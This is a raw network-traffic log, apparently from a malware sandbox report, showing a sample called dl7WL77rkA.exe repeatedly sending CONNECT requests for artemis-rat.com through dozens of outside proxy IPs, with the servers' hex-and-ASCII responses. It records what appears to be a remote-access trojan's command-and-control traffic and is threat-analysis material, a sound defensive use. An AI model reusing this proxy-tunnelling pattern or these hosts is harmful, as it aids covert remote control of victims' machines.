                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1715192.168.2.5549194.182.9.1084433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.697693110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1716192.168.2.554808104.20.125.124803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.697756052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.852153063 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1717192.168.2.554601103.127.1.130803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.699915886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.084530115 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1718192.168.2.55405046.4.252.23790503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.708370924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.702033043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.702018023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.702080011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1719192.168.2.55461215.207.35.24110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.710920095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.105297089 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1720192.168.2.55470835.237.210.21531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.723361969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.534235954 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1721192.168.2.55332474.119.144.6041453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.833403111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1722192.168.2.553967119.18.149.3480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.834656954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1723192.168.2.553225103.105.228.3580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.834659100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.232142925 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            1724192.168.2.55480438.162.8.893128
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.834837914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.287482977 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1725192.168.2.550551162.240.73.148422723876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.838998079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1726192.168.2.554699183.100.14.13480003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.838998079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592586040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.592762947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405340910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.999327898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.701951027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.389390945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1727192.168.2.550582162.214.197.102464303876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.839204073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902410984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.014635086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.014570951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1728192.168.2.554860104.16.143.127803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.839258909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.993612051 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1729192.168.2.554694207.180.234.220377363876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.839576006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592628956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1730192.168.2.554675103.86.109.38803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.840861082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.227899075 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1731192.168.2.55472682.64.77.30803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.840943098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.145682096 CET555INHTTP/1.1 403 Proxy Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Content-Length: 313
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 43 6f 6e 6e 65 63 74 20 74 6f 20 72 65 6d 6f 74 65 20 6d 61 63 68 69 6e 65 20 62 6c 6f 63 6b 65 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Proxy Error</title></head><body><h1>Proxy Error</h1><p>You don't have permission to access this resource.The proxy server could not handle the request<p>Reason: <strong>Connect to remote machine blocked</strong></p></p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.037456989 CET555INHTTP/1.1 403 Proxy Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Content-Length: 313
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 43 6f 6e 6e 65 63 74 20 74 6f 20 72 65 6d 6f 74 65 20 6d 61 63 68 69 6e 65 20 62 6c 6f 63 6b 65 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
